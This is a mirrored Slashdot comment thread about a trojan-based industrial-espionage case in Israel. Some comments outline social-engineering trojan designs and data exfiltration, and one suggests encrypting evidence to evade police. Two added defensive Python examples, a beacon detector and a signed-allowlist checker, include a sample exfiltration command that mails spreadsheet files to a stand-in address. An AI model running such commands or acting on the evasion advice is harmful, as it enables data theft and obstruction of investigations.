Slashdot Mirror


Trojan Built for Industrial Espionage

xPertCodert writes "Some of the largest Israeli companies are involved in the major industrial espionage case, in which private investigators implanted specially crafted Trojan horses on the computers at unsuspecting companies in a bid to obtain privileged financial and technical data. Given the current state of Windows security and advances in spyware, probably any company has become a very easy target for such spy attack from competitors"

25 of 232 comments

  1. Good by Anonymous Coward · · Score: 3, Insightful

    maybe such incidents will get companies (and Microsoft in particular) to start taking spyware more seriously

    1. Re:Good by Leroy_Brown242 · · Score: 4, Insightful

      HAH!

      Learning from other mistakes? I think you give the industry too much credit. :)

    2. Re:Good by pv2b · · Score: 3, Insightful

      As I said in another thread, the problem isn't computer insecurity, but the fact that people will install anything given enough social engineering. Even if you use an operating system like Mac OS X or Linux or something else similar, where the users aren't typically logged in as root, you can still spy on the user whose account you've infected, which is enough damage right there.

    3. Re:Good by pv2b · · Score: 2, Insightful

      Social engineering.

      1. E-mail the user a "Free Porn" program. This program is then set to launch every time the user logs in. (To make it more plausible, the program then launches a Safari window pointing at your favorite porn site.)

      2. The program is basically a glorified FTP server, allowing the attacker to log into it and retrieve any files accessible from the account. To get past firewalls, it could even actively connect outward to another host to receive instructions, or even be controlled via e-mail.

      Voilà, corporate espionage on Mac OS X or Linux per social engineering.

      Not very subtle, but very effective.
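      Editor's note: the "actively connect outward to another host to receive instructions" channel in the post above leaves a recognisable footprint in outbound connection logs: one internal host contacting one external host on a fixed schedule. The script below is an added example (not code from the thread or from any product) that flags such beacons by the regularity of the gaps between connections. The log line format, the IP addresses (documentation ranges) and the thresholds are all constructed for the demonstration.

```python
"""Flag outbound flows that repeat at a regular interval, the usual footprint
of a trojan that polls a controller for instructions instead of waiting for an
inbound login. Added example; log format, addresses and thresholds are
constructed assumptions, not drawn from the thread."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed firewall-style log: one host beacons to 203.0.113.10 every
# ~5 minutes (small jitter), plus ordinary browsing noise from the same host.
SAMPLE_LOG = """
2005-05-30T08:00:00 action=allow src=10.1.2.3 dst=203.0.113.10 dport=443 proto=tcp
2005-05-30T08:01:10 action=allow src=10.1.2.3 dst=198.51.100.5 dport=80 proto=tcp
2005-05-30T08:01:11 action=allow src=10.1.2.3 dst=198.51.100.5 dport=80 proto=tcp
2005-05-30T08:05:02 action=allow src=10.1.2.3 dst=203.0.113.10 dport=443 proto=tcp
2005-05-30T08:09:58 action=allow src=10.1.2.3 dst=203.0.113.10 dport=443 proto=tcp
2005-05-30T08:12:00 action=allow src=10.1.2.4 dst=203.0.113.10 dport=443 proto=tcp
2005-05-30T08:15:01 action=allow src=10.1.2.3 dst=203.0.113.10 dport=443 proto=tcp
2005-05-30T08:20:00 action=allow src=10.1.2.3 dst=203.0.113.10 dport=443 proto=tcp
2005-05-30T08:33:40 action=allow src=10.1.2.3 dst=198.51.100.5 dport=80 proto=tcp
2005-05-30T08:34:02 action=allow src=10.1.2.3 dst=198.51.100.5 dport=80 proto=tcp
2005-05-30T08:40:00 action=allow src=10.1.2.4 dst=203.0.113.10 dport=443 proto=tcp
""".strip().splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\S+) action=allow src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) proto=(?P<proto>\w+)$"
)


def parse_line(line):
    """Return a dict for a matching log line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["dport"] = int(rec["dport"])
    return rec


def find_beacons(lines, min_hits=4, max_jitter=0.15):
    """Return [(src, dst, dport, hits, mean_gap_seconds)] for flows whose
    connection gaps are nearly constant. max_jitter is the coefficient of
    variation (stdev / mean) of the gaps; a fixed sleep with small jitter
    lands far below 0.15, while human browsing is bursty and scores high."""
    flows = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            flows[(rec["src"], rec["dst"], rec["dport"])].append(rec["ts"])

    findings = []
    for key, stamps in flows.items():
        if len(stamps) < min_hits:        # too few samples to call it a schedule
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_jitter:
            findings.append((*key, len(stamps), round(mean)))
    return findings


if __name__ == "__main__":
    for src, dst, dport, hits, gap in find_beacons(SAMPLE_LOG):
        print(f"beacon: {src} -> {dst}:{dport}, {hits} hits, every ~{gap}s")
```

      Two caveats a practitioner would add: a trojan that randomises its sleep widely, or one "controlled via e-mail" as the post suggests, will not show this regularity, so this catches the lazy implementation rather than the careful one; and the 10.1.2.4 host with only two hits is deliberately below min_hits, which is the usual trade-off between catching slow beacons and drowning in false positives.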

    4. Re:Good by Dwonis · · Score: 4, Insightful
      Linux probably does not have "just about as many security flaws as Windows", because its design is simpler and there are fewer places for things to go wrong, among other reasons. You are obviously making statements about things you know hardly anything about, so I put you in my foes list to remind me of that.

      However, you've touched on an important point about computer security: to an attacker, the number of security holes in a system is almost totally irrelevant. If I were an attacker, I'd be more concerned about the types of security holes in a system, than the absolute number of them. For example, if I run a malicious webserver, and my goal is to install a key-logging driver into the kernel of a Linux machine that accesses my webserver, I need two types of security flaws: one in the web browser that lets me execute arbitrary code, and one in the OS so I can get root privileges to install the driver.

      This is where people get confused. Having 2 or 2000 local root holes doesn't help me if I can't execute arbitrary code on the computer, and having 2 or 2000 arbitrary code execution holes doesn't help me if I can't get root privileges. I need exactly one hole of each type for my attack to be successful. Beyond that, it makes little difference.

      So, if you create two categories, "secure" and "not secure", Linux and Windows fall into the same category: "not secure". Most systems fall into that category. If you're a decision-maker, and you're forced to use some of these systems, even though you know that they are all "not secure", which ones do you choose?

      You choose the ones that are going to minimize your risk. If that means choosing Linux, or some heterogeneous mix of systems, simply because that arrangement is less popular and therefore less likely to be exploited, then so be it. It's still a sound decision, given the circumstances.

      Regarding people demonizing Microsoft, don't you find it the least bit pathetic that a loosely-knit group of poorly-organized hobbyists working in their spare time can be even remotely competitive against the industry leader, a company that can spend billions of dollars per year on software development?

      What about all the people over the last decade who trusted Microsoft with their data, only to find out that (until recently) Microsoft didn't care about keeping it secure? Should they not be angry?

      What about Microsoft's idea of "ease of use": menus that are never in the same place, and word processors that mangle your data because "it looks like you're writing a letter"? Or how about the general Microsoft "we know better" attitude? Software that makes your computer not do what it's told (DRM)? Product keys? EULAs? Software patents? Mandatory file locks (sharing violation)? The Win32 API? Broken CSS support? Horrible context-switching performance? mikerowesoft.com? "Best Viewed with Internet Explorer"? The need to use defrag.exe? The DR-DOS error messages? Abandoning OS/2? "Abort/Retry/Ignore/Fail"? Direct3D? ActiveX? DLL Hell? "There are no significant bugs in our released software that any significant number of users want fixed"? The way the MSN website seemed to deliberately break itself when people used Opera to view it?

      Microsoft is a leader that's doing a crappy job, on top of its selfish motivations. People don't like that. You may not see Microsoft as being evil, but you shouldn't be surprised or disgusted that others do.

  2. Everyone is vulnerable by a_greer2005 · · Score: 3, Insightful
    In a big company that has a lot of enemies, some within its own gates no doubt, this could happen to any system that is not set up perfectly; a rootkit could be introduced on a *nix system the same way 99% of trojan horses get into win boxes, social engineering.

    By its very nature, a trojan is a program that APPEARS to be good but has an evil payload. Once again, the problem is gullible users and/or techs and/or admins, not Windows per se.

    1. Re:Everyone is vulnerable by Rakshasa+Taisab · · Score: 2, Insightful

      I'm really not gonna comment on the spelling of the parent post... though...

      According to your logic, it doesn't matter if you store millions of dollars in cash under the bed, since a safe is also vulnerable to break-ins.

      --
      - These characters were randomly selected.
  3. Trojans != Security Failure by yotto · · Score: 2, Insightful

    I thought that Trojans were programs that pretended to be something legit but weren't. Other than finding them and putting them in a list of programs to delete in a virus scanner, is there a way to be "secure" with these?
    If the company you are tailoring these trojans to runs Linux, aren't you, as the evil terrorist hacker, going to tailor the trojan to run on Linux?
    Send 90% of the CEOs out there an email that says 'click here for a free iPod!' and we all know what they're going to do, whether they run Windows, Linux, or OS X.

  4. Shouldn't be a problem... by Anonymous Coward · · Score: 2, Insightful

    Smart people shouldn't have that kind of data on a computer that could be attacked by spyware. Keep it on a network segregated from the internet and you keep it to an insider-only problem.

  5. Spyware by mfh · · Score: 1, Insightful

    Microsoft sees spyware as an opportunity for profit.

    --
    The dangers of knowledge trigger emotional distress in human beings.
    1. Re:Spyware by Karzz1 · · Score: 3, Insightful

      Not to mention their new anti-virus business (a subscription service which couples MS anti-virus with their anti-spyware). Am I the only one that sees the conflict of interests here?

      --
      Beware of he who would deny you access to information, for in his heart he dreams himself your master.
  6. Trojans ==human failure. by Anonymous Coward · · Score: 1, Insightful

    To quote a poster when the above is pointed out. "According to your logic, it doesn't matter if you store millions of dollars in cash under the bed, since a safe is also vulnerable to break-ins."

    That ignores the facts that security is a process, not an absolute, and that technical solutions to social problems are hard. Ultimately all solutions can be thwarted, given enough time and resources. The goal, however, is to make whatever they want difficult enough to get that when they do get it, it'll be worth nothing.

  7. Cheap Shots by The_Quinn · · Score: 4, Insightful
    It is cheap to poke your security knife at Microsoft. As you probably know, Linux has its own security issues.

    I've dealt with Linux security enough to know security is work for any OS, especially when you are not just running servers for developers or apps. When you get into Linux desktop users, security takes a lot of work and attention.

  8. Re:The answer to these problems ... by Jeff+DeMaagd · · Score: 3, Insightful

    Trojans are about social engineering. The only way to stop trojans is to prevent the people that might fall for them from ever being able to execute unauthorized programs.

  9. Try It Again, With Strong Encryption! by putko · · Score: 3, Insightful

    "... [The authorities] found dozens of FTP servers in Israel and overseas, including the US. Haephrati is suspected of transferring stolen material from other computers to these FTP servers. The police realized the extent of the affair when they examined some of the files..."

    If there was ever a time to be using encrypted volumes to store files, that was one of them.

    The guy has fileservers full of self-incriminating evidence, but he can't even get his act together enough to strongly encrypt the thing? That's pretty damn sloppy.

    If you did it right, all the cops would have was a bunch of bits, not stuff to put you away for a long time. This tells me the guy wasn't really trying hard enough. He needs to do it again, with feeling.

    --
    http://www.thebricktestament.com/the_law/when_to_stone_your_children/dt21_18a.html
  10. Re:Check (point) your VPN/Firewall by Soul-Burn666 · · Score: 2, Insightful

    The best and strongest firewalls can't protect unsuspecting users from installing trojans by themselves.
    Hell, it doesn't even matter what operating system you use. If you run a trojan/keylogger, the data will leak. It doesn't matter if you're in user mode, all the information you can access can leak outside.

    Surely an easily exploitable system will generally be more prone to this, without user interaction.

    --
    ^_^
  11. The reality is.... by zappepcs · · Score: 3, Insightful

    that this type of attack has most probably been going on for years, without being detected.

    More sophisticated worms and trojans will happen. Think of a virus that stealthily hides on computers, moving across the network till it finds itself on a machine in domain xyz.com. Once there it promulgates quietly, doing no damage, until one of its copies finds files of the variety xxxxx.xls. Then slowly searching those files, sending bits of it back to a server on the internet disguised as mail from the user of that machine.

    It gets even scarier. Imagine that virus looking for your company's cvs server?

    The only thing that I can think of to combat it is to ensure that all applications are checked before being run, and that they have certification by company security infrastructure. This might prevent joe bloggs from working at home and bringing the trojan to work with him.

    It can be done if the program is executed by the user without verification of certification etc.

    To totally lock down your network will become very difficult in the future. Commercial antivirus vendors will have to work very closely with OS groups to actually create a secure computing environment.... and users will not like the efforts they have to go through to participate in that secure environment.

    The current efforts by software vendors and groups will not even come close to stopping such spyware programs.

    Well, that's how I see it anyway... who knows for sure.
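    Editor's note: the post above (and Jeff DeMaagd's reply earlier, "prevent the people that might fall for them from ever being able to execute unauthorized programs") both describe the same control: nothing runs unless it has been checked and certified by the company's own security infrastructure. The script below is an added example of that check, not code from the thread or from any vendor's product: a hash allowlist whose manifest is authenticated with a company key, so that neither the binary nor the list can be swapped by the user who was just mailed a "free iPod" program. The key, the manifest format and the sample "binaries" are constructed for the demonstration.

```python
"""Gate execution on an allowlist of SHA-256 digests carried in a manifest
that the company security team has authenticated. Added example, not from the
thread; key, manifest layout and sample binaries are constructed."""
import hashlib
import hmac
import json

# Constructed demo key. A real deployment keeps this in an HSM/KMS, or better
# uses a public-key signature so endpoints hold only the verification key.
COMPANY_KEY = b"constructed-demo-key-do-not-reuse"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _canonical(allowed: dict) -> bytes:
    # Canonical JSON: key order and whitespace must not change the MAC.
    return json.dumps(allowed, sort_keys=True, separators=(",", ":")).encode()


def sign_manifest(allowed: dict, key: bytes) -> dict:
    """Security team side: allowed maps program name -> sha256 hex digest."""
    mac = hmac.new(key, _canonical(allowed), hashlib.sha256).hexdigest()
    return {"allowed": allowed, "mac": mac}


def verify_manifest(manifest: dict, key: bytes) -> dict:
    """Endpoint side: refuse the whole list if its MAC does not verify."""
    expected = hmac.new(key, _canonical(manifest["allowed"]), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, manifest["mac"]):
        raise ValueError("manifest MAC mismatch: refuse to trust any entry")
    return manifest["allowed"]


def check_execution(name: str, binary: bytes, manifest: dict, key: bytes) -> str:
    """Return 'allow' or 'deny:<reason>'. Any failure is a deny (never fail open)."""
    try:
        allowed = verify_manifest(manifest, key)
    except (ValueError, KeyError, TypeError) as exc:
        return f"deny:{exc}"
    if allowed.get(name) != sha256_hex(binary):
        return "deny:hash not on signed allowlist"
    return "allow"


# Constructed sample programs: the certified build, and a trojaned copy that
# keeps the same name but carries an extra payload line.
APPROVED = b"#!/bin/sh\necho payroll report\n"
TROJAN = APPROVED + b"cat ~/Documents/*.xls | mail -s report dropbox@example.com\n"

MANIFEST = sign_manifest({"payroll": sha256_hex(APPROVED)}, COMPANY_KEY)

# An attacker who can edit the manifest file but lacks the key: new digest, old MAC.
TAMPERED = {"allowed": {"payroll": sha256_hex(TROJAN)}, "mac": MANIFEST["mac"]}


if __name__ == "__main__":
    for label, name, blob, man in [
        ("certified build", "payroll", APPROVED, MANIFEST),
        ("trojaned copy", "payroll", TROJAN, MANIFEST),
        ("unknown program", "freeporn", TROJAN, MANIFEST),
        ("tampered manifest", "payroll", TROJAN, TAMPERED),
    ]:
        print(f"{label:18s} -> {check_execution(name, blob, man, COMPANY_KEY)}")
```

    The point the example makes beyond the post: the allowlist is only as trustworthy as the thing that authenticates it, so the verifier, not the user, must hold the secret, and a manifest that fails verification must poison every entry rather than fall back to the hashes it happens to contain. On Windows this is what Software Restriction Policies / AppLocker hash rules provide natively; the script only shows the logic they implement.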

  12. A lot of this spy stuff just cancels out by Simonetta · · Score: 3, Insightful

    A lot of the supposed loss that results from espionage is mitigated by the fact that the stolen data simply goes from one inept corporate bureaucracy to another. As much as they'd like to, most lame, ossified organizations can't do much to improve their own position regardless of the strategic worth of stolen competitors' data.
    It's just 'Spy vs. Spy'; an endless expensive game that changes very little in the real world.

    And regarding the use of social engineering to break into secure systems and procure passwords, it too has exaggerated importance. The old fashioned tried-and-true methods of blackmail, bribery, kidnapping, and extortion work as well if not better in modern corporate and military environments as they have for hundreds of years. The stricter the corporate punishment for transgressions, the more inflexible the rules, the harder the no-tolerance policy... the cheaper and easier it is to use blackmail and bribery on the target employees. This is why the Americans can't destroy 'the base' (whose Arabic name triggers the NSA internet eavesdropping software). They can't be blackmailed, bribed, or persuaded. Hell, they can't even be found.
    You want a secure corporate environment? Trust your people, pay your people reasonably, don't assume that you can judge their moral character by the molecular structure of their urine. In other words, don't act like a stupid paranoid American.

  13. Could this be the start of a new wave of Trojans? by Laurance · · Score: 1, Insightful

    How open are banks to this kind of attack? Or credit companies, or any of the other thousands of companies that we give our personal data to?

  14. Cheap Shot. by DerekLyons · · Score: 2, Insightful
    Given the current state of Windows security and advances in spyware, probably any company has become a very easy target for such spy attack from competitors
    And of course *no* company knows anything about firewalls, or email scanners, or browser security.... i.e. the article submitter is doing nothing more than taking yet another cheap shot at Microsoft.
  15. Re:Check (point) your VPN/Firewall by DerekLyons · · Score: 1, Insightful
    I'm sure glad I don't rely on closed source products for my security needs. :)
    And of course, you've read (and understood) every single line of code in the source and thus know for certain that your open source product is in fact 100% secure and trustworthy.

    No? Well then, you are absolutely certain that a person well known to you and who you'd trust with unlimited access to your computer has done so?

    No? Then why exactly *do* you trust this code? Because a couple of dozen random strangers have pronounced it good? Because it's been 'in the market' for a while, and no vulnerabilities have surfaced? (Yet.)

    The open or closed state of the code is no guarantee of security. (Witness the spate of recent security updates to Firefox.)

  16. Re:They had insiders, politicians helping them ste by S3D · · Score: 4, Insightful
    I think Israel is the reason for all the problems in the world. All muslims hate them for good reason.
    I'm not surprised that such a post appears on Slashdot, but I'm shocked it was moderated "insightful".
  17. Re:Check (point) your VPN/Firewall by bit01 · · Score: 2, Insightful

    Zealot.

    He didn't claim FOSS security was guaranteed as your entire post assumes. He claimed it was a better alternative than a company with an obvious vested interest.

    ---

    Commercial software bigots - a dying breed.

  18. Re:What then is happening in other places? by Muhammar · · Score: 2, Insightful

    It is happening elsewhere. With less publicity.

    If you are not dumb, you do this kind of job only once or twice. You cover all tracks. And, holy Moses, you don't use your own company to send out e-mails and CDs with the malware.

    1. The author of these trojans tried to sell them to the police (and was turned down because the police found out that he was selling cracker stuff).
    2. He sold his trojan package to a couple of "security" agencies who went ahead and stole data from several rich companies to resell it to the highest bidder.
    3. The trojan author also used his "expertise" to steal and publish a book from his ex-father-in-law.

    Clearly, this guy must have been eager to get in jail. He was lucky - he could have got whacked instead.

    --
    I doubt that we will ever figure out - and I suspect that even if we did figure out we couldn't do much about it
  19. OS security doesn't matter much ... by hadaso · · Score: 2, Insightful

    OS security doesn't matter much if you're doing your daily routine as admin/root. People who configure Windows machines tend to solve problems of "software not running" by giving the user admin privileges. Then any stupid email attachment can install anything. You'd have the same problem if a Unix sysadmin decides to save time solving a user's problem by giving the user root privileges. And if Linux becomes more common you'd see much more of this kind of "problem solving" ("fumble with things until they work, then don't touch anything. Don't try to solve tomorrow's problem. You're paid only to solve the current problem". Of course it works and you cease to touch it when it has too many permissions...)

    The way this story was revealed was that the stupid guy who planted these trojans published publicly excerpts from his ex-wife's father (or mother's husband?) that existed only on the guy's PC. Probably that PC was a private PC that was configured exactly as shipped (i.e., single admin account). Security of the OS doesn't really matter in this setting. I think the real story here was that so many big companies (telecom, satellite TV etc.) bought services from a guy so unprofessional as to host their stuff on the same servers that he uses for revenge against his ex-wife's parent, and then to reveal enough info so that the police can get to him! Obviously he's not a pro. Any pro would have known to use separate destinations for different trojans, and not to reveal info that leads to a single source...